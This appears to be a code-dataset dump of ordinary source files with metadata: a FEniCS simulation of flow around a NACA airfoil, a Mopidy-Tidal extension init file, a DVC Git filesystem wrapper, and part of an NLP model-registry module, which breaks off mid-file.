Point( 0.461516, 0.094825 ),
Point( 0.422059, 0.097095 ),
Point( 0.382787, 0.098537 ),
Point( 0.343868, 0.098810 ),
Point( 0.305921, 0.097852 ),
Point( 0.269212, 0.095696 ),
Point( 0.234002, 0.092400 ),
Point( 0.200538, 0.088046 ),
Point( 0.169056, 0.082736 ),
Point( 0.139770, 0.076589 ),
Point( 0.112880, 0.069743 ),
Point( 0.088560, 0.062343 ),
Point( 0.066964, 0.054540 ),
Point( 0.048221, 0.046485 ),
Point( 0.032437, 0.038325 ),
Point( 0.019693, 0.030193 ),
Point( 0.010051, 0.022209 ),
Point( 0.003547, 0.014471 ),
Point( 0.000198, 0.007052 ),
Point( 0.000000, 0.000000 ),
Point( 0.002885, -0.006437 ),
Point( 0.008765, -0.012027 ),
Point( 0.017579, -0.016779 ),
Point( 0.029250, -0.020704 ),
Point( 0.043684, -0.023825 ),
Point( 0.060773, -0.026172 ),
Point( 0.080396, -0.027782 ),
Point( 0.102423, -0.028706 ),
Point( 0.126714, -0.029000 ),
Point( 0.153123, -0.028734 ),
Point( 0.181496, -0.027986 ),
Point( 0.211676, -0.026843 ),
Point( 0.243500, -0.025401 ),
Point( 0.276797, -0.023760 ),
Point( 0.311396, -0.022023 ),
Point( 0.347115, -0.020295 ),
Point( 0.383767, -0.018677 ),
Point( 0.421506, -0.017200 ),
Point( 0.460025, -0.015646 ),
Point( 0.498824, -0.014038 ),
Point( 0.537674, -0.012432 ),
Point( 0.576342, -0.010875 ),
Point( 0.614595, -0.009404 ),
Point( 0.652198, -0.008049 ),
Point( 0.688920, -0.006829 ),
Point( 0.724534, -0.005754 ),
Point( 0.758815, -0.004826 ),
Point( 0.791547, -0.004042 ),
Point( 0.822520, -0.003392 ),
Point( 0.851537, -0.002863 ),
Point( 0.878408, -0.002440 ),
Point( 0.902958, -0.002109 ),
Point( 0.925025, -0.001853 ),
Point( 0.944461, -0.001659 ),
Point( 0.961137, -0.001514 ),
Point( 0.974939, -0.001409 ),
Point( 0.985774, -0.001335 ),
Point( 0.993567, -0.001286 ),
Point( 0.998264, -0.001258 ),
Point( 0.999833, -0.001249 ),
Point( 1 , 0 )]
blade = mshr.Polygon(domain_vertices);
domain = channel - blade
mesh = mshr.generate_mesh(domain, 50)
class InitialCondition(UserExpression):
def eval(self, values, x):
values[0] = 0.0
values[1] = 0.0
values[2] = 0.0
def value_shape(self):
return (3,)
ic=InitialCondition(degree = 2)
class Boundary_NACA(SubDomain):
def inside(self, x, on_boundary):
tol = 1E-14
return on_boundary and x[0]>-0.05 and x[0]<1.05 and x[1]>-0.1 and x[1]<0.1
boundary_N = Boundary_NACA()
domainBoundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
domainBoundaries.set_all(0)
ds = Measure("ds")[domainBoundaries]
nor = 3
for i in range(nor):
edge_markers = MeshFunction("bool", mesh, mesh.topology().dim() - 1, False)
boundary_N.mark(edge_markers, True)
mesh = refine(mesh, edge_markers)
# Define function spaces
V = VectorElement("CG",mesh.ufl_cell(), 2)
P = FiniteElement("CG",mesh.ufl_cell(), 1)
VP = MixedElement([V, P])
W = FunctionSpace(mesh,VP)
# Define unknown and test function(s)
w = Function(W)
w0 = Function(W)
(v_, p_) = TestFunctions(W)
(v,p)=split(w)
(v0,p0)=split(w0)
bcs = list()
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[0],-1.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[1],-0.5) || near(x[1],0.5)") )
bcs.append( DirichletBC(W.sub(1), Constant(0.0), "near(x[0],2.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((0.0, 0.0)), "x[0]>-0.05 && x[0]<1.05 && x[1]>-0.1 && x[1]<0.1 && on_boundary") )
rho=1e1
mu=1e-3
def sigma(v,p):
return(-p*I + mu*(grad(v)+grad(v).T))
def EQ(v,p,v_,p_):
F = rho*inner(grad(v)*v, v_)*dx - rho*inner(g,v_)*dx + inner(sigma(v,p),grad(v_))*dx
return(F)
n = FacetNormal(mesh)
I = Identity(V.cell().geometric_dimension()) # Identity tensor
h = CellDiameter(mesh)
F=k*0.5*(theta*rho)*inner(v-v0,v_)*dx + theta*EQ(v,p,v_,p_) + (Constant(1.0)-theta)*EQ(v0,p,v_,p_) + div(v)*p_*dx
J = derivative(F, w)
#ffc_options = {"quadrature_degree": 4, "optimize": True, "eliminate_zeros": False}
ffc_options = {"quadrature_degree": 4, "optimize": True}
problem=NonlinearVariationalProblem(F,w,bcs,J,ffc_options)
solver=NonlinearVariationalSolver(problem)
prm = solver.parameters
prm['nonlinear_solver'] = 'newton'
prm['newton_solver']['linear_solver'] = 'umfpack'
prm['newton_solver']['lu_solver']['report'] = False
prm['newton_solver']['lu_solver']['same_nonzero_pattern']=True
prm['newton_solver']['absolute_tolerance'] = 1E-8
prm['newton_solver']['relative_tolerance'] = 1E-8
prm['newton_solver']['maximum_iterations'] = 30
prm['newton_solver']['report'] = True
#prm['newton_solver']['error_on_nonconvergence'] = False
w.assign(interpolate(ic,W))
w0.assign(interpolate(ic,W))
(v,p) = w.split()
(v0,p0) = w0.split()
# Create files for storing solution
vfile = File("%s.results/velocity.pvd" % (fileName))
pfile = File("%s.results/pressure.pvd" % (fileName))
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
# Time-stepping
t = dt
while t < t_end:
print("t =%d", t)
begin("Solving transport...")
solver.solve()
end()
(v,p)=w.split(True)
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
w0.assign(w)
t += dt # t:=t+1
# Report drag and lift
force = dot(sigma(v,p), n)
D = (force[0]/0.002)*ds(5)
L = (force[1]/0.002)*ds(5)
#drag = assemble(D)
#lift = assemble(L)
#info("drag= %e lift= %e" % (drag , lift))
|
<filename>NACA.py
##http://airfoiltools.com/airfoil/naca4digit
from dolfin import *
import ufl
import time
import os
import mshr
# get file name
fileName = os.path.splitext(__file__)[0]
parameters["form_compiler"]["cpp_optimize"] = True
parameters["form_compiler"]["quadrature_degree"] = 8
#parameters["form_compiler"]["quadrature_rule"] = 'auto'
comm = mpi_comm_world()
rank = MPI.rank(comm)
set_log_level(INFO if rank==0 else INFO+1)
ufl.set_level(ufl.INFO if rank==0 else ufl.INFO+1)
parameters["std_out_all_processes"] = False;
info_blue(dolfin.__version__)
# Time stepping parameters
dt = 0.01
t_end = 1.0
theta=Constant(0.5) # theta schema
k=Constant(1.0/dt)
g=Constant((0.0,-1.0))
## Create mesh
channel = mshr.Rectangle(Point(-1.0, -0.5),Point(2, 0.5))
# Create list of polygonal domain vertices for the car
domain_vertices = [Point(1, 0 ),
Point( 1.000167, 0.001249 ),
Point( 0.998653, 0.001668 ),
Point( 0.994122, 0.002919 ),
Point( 0.986596, 0.004976 ),
Point( 0.976117, 0.007801 ),
Point( 0.962742, 0.011341 ),
Point( 0.946545, 0.015531 ),
Point( 0.927615, 0.020294 ),
Point( 0.906059, 0.025547 ),
Point( 0.881998, 0.031197 ),
Point( 0.855570, 0.037149 ),
Point( 0.826928, 0.043305 ),
Point( 0.796239, 0.049564 ),
Point( 0.763684, 0.055826 ),
Point( 0.729457, 0.061992 ),
Point( 0.693763, 0.067967 ),
Point( 0.656819, 0.073655 ),
Point( 0.618851, 0.078967 ),
Point( 0.580092, 0.083817 ),
Point( 0.540785, 0.088125 ),
Point( 0.501176, 0.091816 ),
Point( 0.461516, 0.094825 ),
Point( 0.422059, 0.097095 ),
Point( 0.382787, 0.098537 ),
Point( 0.343868, 0.098810 ),
Point( 0.305921, 0.097852 ),
Point( 0.269212, 0.095696 ),
Point( 0.234002, 0.092400 ),
Point( 0.200538, 0.088046 ),
Point( 0.169056, 0.082736 ),
Point( 0.139770, 0.076589 ),
Point( 0.112880, 0.069743 ),
Point( 0.088560, 0.062343 ),
Point( 0.066964, 0.054540 ),
Point( 0.048221, 0.046485 ),
Point( 0.032437, 0.038325 ),
Point( 0.019693, 0.030193 ),
Point( 0.010051, 0.022209 ),
Point( 0.003547, 0.014471 ),
Point( 0.000198, 0.007052 ),
Point( 0.000000, 0.000000 ),
Point( 0.002885, -0.006437 ),
Point( 0.008765, -0.012027 ),
Point( 0.017579, -0.016779 ),
Point( 0.029250, -0.020704 ),
Point( 0.043684, -0.023825 ),
Point( 0.060773, -0.026172 ),
Point( 0.080396, -0.027782 ),
Point( 0.102423, -0.028706 ),
Point( 0.126714, -0.029000 ),
Point( 0.153123, -0.028734 ),
Point( 0.181496, -0.027986 ),
Point( 0.211676, -0.026843 ),
Point( 0.243500, -0.025401 ),
Point( 0.276797, -0.023760 ),
Point( 0.311396, -0.022023 ),
Point( 0.347115, -0.020295 ),
Point( 0.383767, -0.018677 ),
Point( 0.421506, -0.017200 ),
Point( 0.460025, -0.015646 ),
Point( 0.498824, -0.014038 ),
Point( 0.537674, -0.012432 ),
Point( 0.576342, -0.010875 ),
Point( 0.614595, -0.009404 ),
Point( 0.652198, -0.008049 ),
Point( 0.688920, -0.006829 ),
Point( 0.724534, -0.005754 ),
Point( 0.758815, -0.004826 ),
Point( 0.791547, -0.004042 ),
Point( 0.822520, -0.003392 ),
Point( 0.851537, -0.002863 ),
Point( 0.878408, -0.002440 ),
Point( 0.902958, -0.002109 ),
Point( 0.925025, -0.001853 ),
Point( 0.944461, -0.001659 ),
Point( 0.961137, -0.001514 ),
Point( 0.974939, -0.001409 ),
Point( 0.985774, -0.001335 ),
Point( 0.993567, -0.001286 ),
Point( 0.998264, -0.001258 ),
Point( 0.999833, -0.001249 ),
Point( 1 , 0 )]
blade = mshr.Polygon(domain_vertices);
domain = channel - blade
mesh = mshr.generate_mesh(domain, 50)
class InitialCondition(UserExpression):
def eval(self, values, x):
values[0] = 0.0
values[1] = 0.0
values[2] = 0.0
def value_shape(self):
return (3,)
ic=InitialCondition(degree = 2)
class Boundary_NACA(SubDomain):
def inside(self, x, on_boundary):
tol = 1E-14
return on_boundary and x[0]>-0.05 and x[0]<1.05 and x[1]>-0.1 and x[1]<0.1
boundary_N = Boundary_NACA()
domainBoundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
domainBoundaries.set_all(0)
ds = Measure("ds")[domainBoundaries]
nor = 3
for i in range(nor):
edge_markers = MeshFunction("bool", mesh, mesh.topology().dim() - 1, False)
boundary_N.mark(edge_markers, True)
mesh = refine(mesh, edge_markers)
# Define function spaces
V = VectorElement("CG",mesh.ufl_cell(), 2)
P = FiniteElement("CG",mesh.ufl_cell(), 1)
VP = MixedElement([V, P])
W = FunctionSpace(mesh,VP)
# Define unknown and test function(s)
w = Function(W)
w0 = Function(W)
(v_, p_) = TestFunctions(W)
(v,p)=split(w)
(v0,p0)=split(w0)
bcs = list()
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[0],-1.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((1.0, 0.0)), "near(x[1],-0.5) || near(x[1],0.5)") )
bcs.append( DirichletBC(W.sub(1), Constant(0.0), "near(x[0],2.0)") )
bcs.append( DirichletBC(W.sub(0), Constant((0.0, 0.0)), "x[0]>-0.05 && x[0]<1.05 && x[1]>-0.1 && x[1]<0.1 && on_boundary") )
rho=1e1
mu=1e-3
def sigma(v,p):
return(-p*I + mu*(grad(v)+grad(v).T))
def EQ(v,p,v_,p_):
F = rho*inner(grad(v)*v, v_)*dx - rho*inner(g,v_)*dx + inner(sigma(v,p),grad(v_))*dx
return(F)
n = FacetNormal(mesh)
I = Identity(V.cell().geometric_dimension()) # Identity tensor
h = CellDiameter(mesh)
F=k*0.5*(theta*rho)*inner(v-v0,v_)*dx + theta*EQ(v,p,v_,p_) + (Constant(1.0)-theta)*EQ(v0,p,v_,p_) + div(v)*p_*dx
J = derivative(F, w)
#ffc_options = {"quadrature_degree": 4, "optimize": True, "eliminate_zeros": False}
ffc_options = {"quadrature_degree": 4, "optimize": True}
problem=NonlinearVariationalProblem(F,w,bcs,J,ffc_options)
solver=NonlinearVariationalSolver(problem)
prm = solver.parameters
prm['nonlinear_solver'] = 'newton'
prm['newton_solver']['linear_solver'] = 'umfpack'
prm['newton_solver']['lu_solver']['report'] = False
prm['newton_solver']['lu_solver']['same_nonzero_pattern']=True
prm['newton_solver']['absolute_tolerance'] = 1E-8
prm['newton_solver']['relative_tolerance'] = 1E-8
prm['newton_solver']['maximum_iterations'] = 30
prm['newton_solver']['report'] = True
#prm['newton_solver']['error_on_nonconvergence'] = False
w.assign(interpolate(ic,W))
w0.assign(interpolate(ic,W))
(v,p) = w.split()
(v0,p0) = w0.split()
# Create files for storing solution
vfile = File("%s.results/velocity.pvd" % (fileName))
pfile = File("%s.results/pressure.pvd" % (fileName))
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
# Time-stepping
t = dt
while t < t_end:
print("t =%d", t)
begin("Solving transport...")
solver.solve()
end()
(v,p)=w.split(True)
v.rename("v", "velocity") ; vfile << v
p.rename("p", "pressure") ; pfile << p
w0.assign(w)
t += dt # t:=t+1
# Report drag and lift
force = dot(sigma(v,p), n)
D = (force[0]/0.002)*ds(5)
L = (force[1]/0.002)*ds(5)
#drag = assemble(D)
#lift = assemble(L)
#info("drag= %e lift= %e" % (drag , lift))
|
en
| 0.363331
|
##http://airfoiltools.com/airfoil/naca4digit # get file name #parameters["form_compiler"]["quadrature_rule"] = 'auto' # Time stepping parameters # theta schema ## Create mesh # Create list of polygonal domain vertices for the car # Define function spaces # Define unknown and test function(s) # Identity tensor #ffc_options = {"quadrature_degree": 4, "optimize": True, "eliminate_zeros": False} #prm['newton_solver']['error_on_nonconvergence'] = False # Create files for storing solution # Time-stepping # t:=t+1 # Report drag and lift #drag = assemble(D) #lift = assemble(L) #info("drag= %e lift= %e" % (drag , lift))
| 2.054391
| 2
|
mopidy_tidal/__init__.py
|
mones88/mopidy-tidal
| 30
|
6627599
|
from __future__ import unicode_literals
import logging
import os
import sys
from mopidy import config, ext
__version__ = '0.2.7'
# TODO: If you need to log, use loggers named after the current Python module
logger = logging.getLogger(__name__)
file_dir = os.path.dirname(__file__)
sys.path.append(file_dir)
class Extension(ext.Extension):
dist_name = 'Mopidy-Tidal'
ext_name = 'tidal'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = super(Extension, self).get_config_schema()
schema['quality'] = config.String(choices=["LOSSLESS", "HIGH", "LOW"])
schema['client_id'] = config.String(optional=True)
schema['client_secret'] = config.String(optional=True)
return schema
def setup(self, registry):
from .backend import TidalBackend
registry.add('backend', TidalBackend)
|
from __future__ import unicode_literals
import logging
import os
import sys
from mopidy import config, ext
__version__ = '0.2.7'
# TODO: If you need to log, use loggers named after the current Python module
logger = logging.getLogger(__name__)
file_dir = os.path.dirname(__file__)
sys.path.append(file_dir)
class Extension(ext.Extension):
dist_name = 'Mopidy-Tidal'
ext_name = 'tidal'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = super(Extension, self).get_config_schema()
schema['quality'] = config.String(choices=["LOSSLESS", "HIGH", "LOW"])
schema['client_id'] = config.String(optional=True)
schema['client_secret'] = config.String(optional=True)
return schema
def setup(self, registry):
from .backend import TidalBackend
registry.add('backend', TidalBackend)
|
en
| 0.689266
|
# TODO: If you need to log, use loggers named after the current Python module
| 2.128798
| 2
|
dvc/fs/git.py
|
PietrassykFP/dvc
| 1
|
6627600
|
import os
import threading
from typing import TYPE_CHECKING, Any, Callable
from funcy import cached_property, wrap_prop
from .fsspec_wrapper import AnyFSPath, FSSpecWrapper
if TYPE_CHECKING:
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
from scmrepo.git import Git
from scmrepo.git.objects import GitTrie
class GitFileSystem(FSSpecWrapper): # pylint:disable=abstract-method
"""Proxies the repo file access methods to Git objects"""
sep = os.sep
scheme = "local"
def __init__(
self,
path: str = None,
rev: str = None,
scm: "Git" = None,
trie: "GitTrie" = None,
**kwargs: Any,
) -> None:
from dvc.scm import resolve_rev
super().__init__()
self.fs_args.update(
{
"path": path,
"rev": rev,
"scm": scm,
"trie": trie,
"rev_resolver": resolve_rev,
**kwargs,
}
)
@wrap_prop(threading.Lock())
@cached_property
def fs(self) -> "FsspecGitFileSystem":
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
return FsspecGitFileSystem(**self.fs_args)
@property
def rev(self) -> str:
return self.fs.rev
def isfile(self, path: AnyFSPath) -> bool:
return self.fs.isfile(path)
def walk(
self,
top: AnyFSPath,
topdown: bool = True,
onerror: Callable[[OSError], None] = None,
**kwargs: Any,
):
return self.fs.walk(top, topdown=topdown, onerror=onerror, **kwargs)
|
import os
import threading
from typing import TYPE_CHECKING, Any, Callable
from funcy import cached_property, wrap_prop
from .fsspec_wrapper import AnyFSPath, FSSpecWrapper
if TYPE_CHECKING:
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
from scmrepo.git import Git
from scmrepo.git.objects import GitTrie
class GitFileSystem(FSSpecWrapper): # pylint:disable=abstract-method
"""Proxies the repo file access methods to Git objects"""
sep = os.sep
scheme = "local"
def __init__(
self,
path: str = None,
rev: str = None,
scm: "Git" = None,
trie: "GitTrie" = None,
**kwargs: Any,
) -> None:
from dvc.scm import resolve_rev
super().__init__()
self.fs_args.update(
{
"path": path,
"rev": rev,
"scm": scm,
"trie": trie,
"rev_resolver": resolve_rev,
**kwargs,
}
)
@wrap_prop(threading.Lock())
@cached_property
def fs(self) -> "FsspecGitFileSystem":
from scmrepo.fs import GitFileSystem as FsspecGitFileSystem
return FsspecGitFileSystem(**self.fs_args)
@property
def rev(self) -> str:
return self.fs.rev
def isfile(self, path: AnyFSPath) -> bool:
return self.fs.isfile(path)
def walk(
self,
top: AnyFSPath,
topdown: bool = True,
onerror: Callable[[OSError], None] = None,
**kwargs: Any,
):
return self.fs.walk(top, topdown=topdown, onerror=onerror, **kwargs)
|
en
| 0.663718
|
# pylint:disable=abstract-method Proxies the repo file access methods to Git objects
| 2.163122
| 2
|
python/baseline/model.py
|
domyounglee/baseline
| 0
|
6627601
|
<filename>python/baseline/model.py
import logging
import numpy as np
from baseline.utils import (
export, optional_params, listify, register, import_user_module, read_json
)
__all__ = []
exporter = export(__all__)
logger = logging.getLogger('baseline')
BASELINE_MODELS = {}
BASELINE_LOADERS = {}
@exporter
@optional_params
def register_model(cls, task, name=None):
"""Register a function as a plug-in"""
if name is None:
name = cls.__name__
names = listify(name)
if task not in BASELINE_MODELS:
BASELINE_MODELS[task] = {}
if task not in BASELINE_LOADERS:
BASELINE_LOADERS[task] = {}
if hasattr(cls, 'create'):
def create(*args, **kwargs):
return cls.create(*args, **kwargs)
else:
def create(*args, **kwargs):
return cls(*args, **kwargs)
for alias in names:
if alias in BASELINE_MODELS[task]:
raise Exception('Error: attempt to re-define previously registered handler {} (old: {}, new: {}) for task {} in registry'.format(alias, BASELINE_MODELS[task], cls, task))
BASELINE_MODELS[task][alias] = create
if hasattr(cls, 'load'):
BASELINE_LOADERS[task][alias] = cls.load
return cls
@exporter
def create_model_for(activity, input_, output_, **kwargs):
model_type = kwargs.get('type', kwargs.get('model_type', 'default'))
creator_fn = BASELINE_MODELS[activity][model_type]
logger.info('Calling model %s', creator_fn)
if output_ is not None:
return creator_fn(input_, output_, **kwargs)
return creator_fn(input_, **kwargs)
@exporter
def create_model(embeddings, labels, **kwargs):
return create_model_for('classify', embeddings, labels, **kwargs)
@exporter
def create_tagger_model(embeddings, labels, **kwargs):
return create_model_for('tagger', embeddings, labels, **kwargs)
BASELINE_SEQ2SEQ_ENCODERS = {}
@exporter
@optional_params
def register_encoder(cls, name=None):
"""Register a function as a plug-in"""
return register(cls, BASELINE_SEQ2SEQ_ENCODERS, name, 'encoder')
BASELINE_SEQ2SEQ_DECODERS = {}
@exporter
@optional_params
def register_decoder(cls, name=None):
"""Register a function as a plug-in"""
return register(cls, BASELINE_SEQ2SEQ_DECODERS, name, 'decoder')
BASELINE_SEQ2SEQ_ARC_POLICY = {}
@exporter
@optional_params
def register_arc_policy(cls, name=None):
"""Register a function as a plug-in"""
return register(cls, BASELINE_SEQ2SEQ_ARC_POLICY, name, 'decoder')
@exporter
def create_seq2seq_decoder(tgt_embeddings, **kwargs):
decoder_type = kwargs.get('decoder_type', 'default')
Constructor = BASELINE_SEQ2SEQ_DECODERS.get(decoder_type)
return Constructor(tgt_embeddings, **kwargs)
@exporter
def create_seq2seq_encoder(**kwargs):
encoder_type = kwargs.get('encoder_type', 'default')
Constructor = BASELINE_SEQ2SEQ_ENCODERS.get(encoder_type)
return Constructor(**kwargs)
@exporter
def create_seq2seq_arc_policy(**kwargs):
arc_type = kwargs.get('arc_policy_type', 'default')
Constructor = BASELINE_SEQ2SEQ_ARC_POLICY.get(arc_type)
return Constructor()
@exporter
def create_seq2seq_model(embeddings, labels, **kwargs):
return create_model_for('seq2seq', embeddings, labels, **kwargs)
@exporter
def create_lang_model(embeddings, **kwargs):
return create_model_for('lm', embeddings, None, **kwargs)
@exporter
def load_model_for(activity, filename, **kwargs):
# Sniff state to see if we need to import things
state = read_json('{}.state'.format(filename))
# There won't be a module for pytorch (there is no state file to load).
if 'module' in state:
import_user_module(state['module'])
# Allow user to override model type (for back compat with old api), backoff
# to the model type in the state file or to default.
# TODO: Currently in pytorch all models are always reloaded with the load
# classmethod with a default model class. This is fine given how simple pyt
# loading is but it could cause problems if a model has a custom load
model_type = kwargs.get('type', kwargs.get('model_type', state.get('type', state.get('model_type', 'default'))))
creator_fn = BASELINE_LOADERS[activity][model_type]
logger.info('Calling model %s', creator_fn)
return creator_fn(filename, **kwargs)
@exporter
def load_model(filename, **kwargs):
return load_model_for('classify', filename, **kwargs)
@exporter
def load_tagger_model(filename, **kwargs):
return load_model_for('tagger', filename, **kwargs)
@exporter
def load_seq2seq_model(filename, **kwargs):
return load_model_for('seq2seq', filename, **kwargs)
@exporter
def load_lang_model(filename, **kwargs):
return load_model_for('lm', filename, **kwargs)
@exporter
class ClassifierModel(object):
"""Text classifier
Provide an interface to DNN classifiers that use word lookup tables.
"""
task_name = 'classify'
def __init__(self):
super(ClassifierModel, self).__init__()
def save(self, basename):
"""Save this model out
:param basename: Name of the model, not including suffixes
:return: None
"""
pass
@classmethod
def load(cls, basename, **kwargs):
"""Load the model from a basename, including directory
:param basename: Name of the model, not including suffixes
:param kwargs: Anything that is useful to optimize experience for a specific framework
:return: A newly created model
"""
pass
def predict(self, batch_dict):
"""Classify a batch of text with whatever features the model can use from the batch_dict.
The indices correspond to get_vocab().get('word', 0)
:param batch_dict: This normally contains `x`, a `BxT` tensor of indices. Some classifiers and readers may
provide other features
:return: A list of lists of tuples (label, value)
"""
pass
# deprecated: use predict
def classify(self, batch_dict):
logger.warning('`classify` is deprecated, use `predict` instead.')
return self.predict(batch_dict)
def get_labels(self):
"""Return a list of labels, where the offset within the list is the location in a confusion matrix, etc.
:return: A list of the labels for the decision
"""
pass
@exporter
class TaggerModel(object):
"""Structured prediction classifier, AKA a tagger
This class takes a temporal signal, represented as words over time, and characters of words
and generates an output label for each time. This type of model is used for POS tagging or any
type of chunking (e.g. NER, POS chunks, slot-filling)
"""
task_name = 'tagger'
def __init__(self):
super(TaggerModel, self).__init__()
def save(self, basename):
pass
@staticmethod
def load(basename, **kwargs):
pass
def predict(self, batch_dict):
pass
def get_labels(self):
pass
@exporter
class LanguageModel(object):
task_name = 'lm'
def __init__(self):
super(LanguageModel, self).__init__()
@staticmethod
def load(basename, **kwargs):
pass
@classmethod
def create(cls, embeddings, **kwargs):
pass
def predict(self, batch_dict, **kwargs):
pass
@exporter
class EncoderDecoderModel(object):
task_name = 'seq2seq'
def save(self, model_base):
pass
def __init__(self, *args, **kwargs):
super(EncoderDecoderModel, self).__init__()
@staticmethod
def load(basename, **kwargs):
pass
@classmethod
def create(cls, src_embeddings, dst_embedding, **kwargs):
pass
def create_loss(self):
pass
def predict(self, source_dict, **kwargs):
pass
# deprecated: use predict
def run(self, source_dict, **kwargs):
logger.warning('`run` is deprecated, use `predict` instead.')
return self.predict(source_dict, **kwargs)
|
<filename>python/baseline/model.py
import logging
import numpy as np
from baseline.utils import (
export, optional_params, listify, register, import_user_module, read_json
)
__all__ = []
exporter = export(__all__)
logger = logging.getLogger('baseline')
BASELINE_MODELS = {}
BASELINE_LOADERS = {}
@exporter
@optional_params
def register_model(cls, task, name=None):
"""Register a function as a plug-in"""
if name is None:
name = cls.__name__
names = listify(name)
if task not in BASELINE_MODELS:
BASELINE_MODELS[task] = {}
if task not in BASELINE_LOADERS:
BASELINE_LOADERS[task] = {}
if hasattr(cls, 'create'):
def create(*args, **kwargs):
return cls.create(*args, **kwargs)
else:
def create(*args, **kwargs):
return cls(*args, **kwargs)
for alias in names:
if alias in BASELINE_MODELS[task]:
raise Exception('Error: attempt to re-define previously registered handler {} (old: {}, new: {}) for task {} in registry'.format(alias, BASELINE_MODELS[task], cls, task))
BASELINE_MODELS[task][alias] = create
if hasattr(cls, 'load'):
BASELINE_LOADERS[task][alias] = cls.load
return cls
@exporter
def create_model_for(activity, input_, output_, **kwargs):
model_type = kwargs.get('type', kwargs.get('model_type', 'default'))
creator_fn = BASELINE_MODELS[activity][model_type]
logger.info('Calling model %s', creator_fn)
if output_ is not None:
return creator_fn(input_, output_, **kwargs)
return creator_fn(input_, **kwargs)
@exporter
def create_model(embeddings, labels, **kwargs):
return create_model_for('classify', embeddings, labels, **kwargs)
@exporter
def create_tagger_model(embeddings, labels, **kwargs):
return create_model_for('tagger', embeddings, labels, **kwargs)
BASELINE_SEQ2SEQ_ENCODERS = {}
@exporter
@optional_params
def register_encoder(cls, name=None):
"""Register a function as a plug-in"""
return register(cls, BASELINE_SEQ2SEQ_ENCODERS, name, 'encoder')
BASELINE_SEQ2SEQ_DECODERS = {}
@exporter
@optional_params
def register_decoder(cls, name=None):
"""Register a function as a plug-in"""
return register(cls, BASELINE_SEQ2SEQ_DECODERS, name, 'decoder')
BASELINE_SEQ2SEQ_ARC_POLICY = {}
@exporter
@optional_params
def register_arc_policy(cls, name=None):
"""Register a function as a plug-in"""
return register(cls, BASELINE_SEQ2SEQ_ARC_POLICY, name, 'decoder')
@exporter
def create_seq2seq_decoder(tgt_embeddings, **kwargs):
decoder_type = kwargs.get('decoder_type', 'default')
Constructor = BASELINE_SEQ2SEQ_DECODERS.get(decoder_type)
return Constructor(tgt_embeddings, **kwargs)
@exporter
def create_seq2seq_encoder(**kwargs):
encoder_type = kwargs.get('encoder_type', 'default')
Constructor = BASELINE_SEQ2SEQ_ENCODERS.get(encoder_type)
return Constructor(**kwargs)
@exporter
def create_seq2seq_arc_policy(**kwargs):
arc_type = kwargs.get('arc_policy_type', 'default')
Constructor = BASELINE_SEQ2SEQ_ARC_POLICY.get(arc_type)
return Constructor()
@exporter
def create_seq2seq_model(embeddings, labels, **kwargs):
return create_model_for('seq2seq', embeddings, labels, **kwargs)
@exporter
def create_lang_model(embeddings, **kwargs):
return create_model_for('lm', embeddings, None, **kwargs)
@exporter
def load_model_for(activity, filename, **kwargs):
# Sniff state to see if we need to import things
state = read_json('{}.state'.format(filename))
# There won't be a module for pytorch (there is no state file to load).
if 'module' in state:
import_user_module(state['module'])
# Allow user to override model type (for back compat with old api), backoff
# to the model type in the state file or to default.
# TODO: Currently in pytorch all models are always reloaded with the load
# classmethod with a default model class. This is fine given how simple pyt
# loading is but it could cause problems if a model has a custom load
model_type = kwargs.get('type', kwargs.get('model_type', state.get('type', state.get('model_type', 'default'))))
creator_fn = BASELINE_LOADERS[activity][model_type]
logger.info('Calling model %s', creator_fn)
return creator_fn(filename, **kwargs)
@exporter
def load_model(filename, **kwargs):
return load_model_for('classify', filename, **kwargs)
@exporter
def load_tagger_model(filename, **kwargs):
return load_model_for('tagger', filename, **kwargs)
@exporter
def load_seq2seq_model(filename, **kwargs):
return load_model_for('seq2seq', filename, **kwargs)
@exporter
def load_lang_model(filename, **kwargs):
return load_model_for('lm', filename, **kwargs)
@exporter
class ClassifierModel(object):
"""Text classifier
Provide an interface to DNN classifiers that use word lookup tables.
"""
task_name = 'classify'
def __init__(self):
super(ClassifierModel, self).__init__()
def save(self, basename):
"""Save this model out
:param basename: Name of the model, not including suffixes
:return: None
"""
pass
@classmethod
def load(cls, basename, **kwargs):
"""Load the model from a basename, including directory
:param basename: Name of the model, not including suffixes
:param kwargs: Anything that is useful to optimize experience for a specific framework
:return: A newly created model
"""
pass
def predict(self, batch_dict):
"""Classify a batch of text with whatever features the model can use from the batch_dict.
The indices correspond to get_vocab().get('word', 0)
:param batch_dict: This normally contains `x`, a `BxT` tensor of indices. Some classifiers and readers may
provide other features
:return: A list of lists of tuples (label, value)
"""
pass
# deprecated: use predict
def classify(self, batch_dict):
logger.warning('`classify` is deprecated, use `predict` instead.')
return self.predict(batch_dict)
def get_labels(self):
"""Return a list of labels, where the offset within the list is the location in a confusion matrix, etc.
:return: A list of the labels for the decision
"""
pass
@exporter
class TaggerModel(object):
"""Structured prediction classifier, AKA a tagger
This class takes a temporal signal, represented as words over time, and characters of words
and generates an output label for each time. This type of model is used for POS tagging or any
type of chunking (e.g. NER, POS chunks, slot-filling)
"""
task_name = 'tagger'
def __init__(self):
super(TaggerModel, self).__init__()
def save(self, basename):
pass
@staticmethod
def load(basename, **kwargs):
pass
def predict(self, batch_dict):
pass
def get_labels(self):
pass
@exporter
class LanguageModel(object):
task_name = 'lm'
def __init__(self):
super(LanguageModel, self).__init__()
@staticmethod
def load(basename, **kwargs):
pass
@classmethod
def create(cls, embeddings, **kwargs):
pass
def predict(self, batch_dict, **kwargs):
pass
@exporter
